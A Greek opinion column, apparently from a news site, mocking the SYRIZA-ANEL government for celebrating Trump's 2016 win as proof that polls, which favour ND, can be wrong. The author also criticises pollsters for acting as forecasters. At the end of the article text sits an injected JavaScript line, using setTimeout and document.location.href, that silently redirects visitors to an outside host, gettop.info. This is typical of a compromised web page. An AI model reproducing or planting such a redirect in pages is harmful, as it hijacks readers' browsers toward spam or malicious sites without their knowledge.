Κέρδισε ο Ντόναλντ Τραμπ στις ΗΠΑ και πανηγυρίζουν στην ελληνική κυβέρνηση;

0
7

 

Απίστευτο και, όμως, αληθινό. Ο Αλέξης Τσίπρας, οι υπουργοί, τα στελέχη του Σύριζα και των ΑΝΕΛ, οι στρατευμένοι δημοσιογράφοι…όλοι έχουν στήσει τρελό γλέντι από χθες.

Όχι, βέβαια, γι’ αυτή καθεαυτή τη νίκη του Ρεπουμπλικάνου υποψηφίου, αλλά για το γεγονός ότι ήρθε πρώτος κόντρα στις δημοσκοπήσεις. Σπεύδουν δε να συμπληρώσουν ότι το ίδιο συνέβη και στο δημοψήφισμα στη Βρετανία. Τα γκάλοπ προέβλεπαν νίκη του Βremain και, τελικά, πήρε 52% το Βrexit.

Η ελπίδα του Μεγάρου Μαξίμου είναι ότι και οι ελληνικές δημοσκοπήσεις, που δίνουν καθαρό προβάδισμα στη ΝΔ, πέφτουν έξω.

«Σε όλο τον πλανήτη οι δημοσκόποι γελοιοποιούνται, γιατί να αποτελέσει εξαίρεση η Ελλάδα;» διερωτώνται. «Μήπως στο περσινό δημοψήφισμα στη χώρα μας δεν ηττήθηκαν πανηγυρικά; Δεν μιλούσαν για οριακό αποτέλεσμα και, τελικά, επικράτησε το ‘ΟΧΙ’ με διαφορά 24 μονάδων»;

Δεν υπάρχει αμφιβολία: οι εταιρείες δημοσκοπήσεων, ανά τον κόσμο, αντιμετωπίζουν υπαρξιακό πρόβλημα. Όχι γιατί δεν καταφέρνουν να καταγράψουν τις τάσεις που διατρέχουν τις κοινωνίες. Αλλά διότι επιχειρούν να παραστήσουν τους μάντεις, κάνοντας προβλέψεις εκλογικών αποτελεσμάτων. Με δυο λόγια, διεθνώς οι δημοσκόποι έχουν ξεφύγει από το ρόλο τους.

Η γνώμη μου ήταν και παραμένει η εξής: να διαβάζουμε τα γκάλοπ προσεκτικά και να χρησιμοποιούμε τα ευρήματά τους μόνο ως εργαλεία ανάλυσης της πραγματικότητας. Και η σημερινή πραγματικότητα στην Ελλάδα είναι εξαιρετικά επώδυνη για τους Έλληνες. Η ζωή μας συνεχώς υποβαθμίζεται και η κυβέρνηση Σύρζα-ΑΝΕΛ, όχι απλώς δεν μπορεί να κάνει τίποτα γι αυτό, αλλά πασχίζει να μας πείσει πως όλα βαίνουν καλώς.

Συνεπώς, ας περιοριστούν οι χοροί στο Μέγαρο Μαξίμου… setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here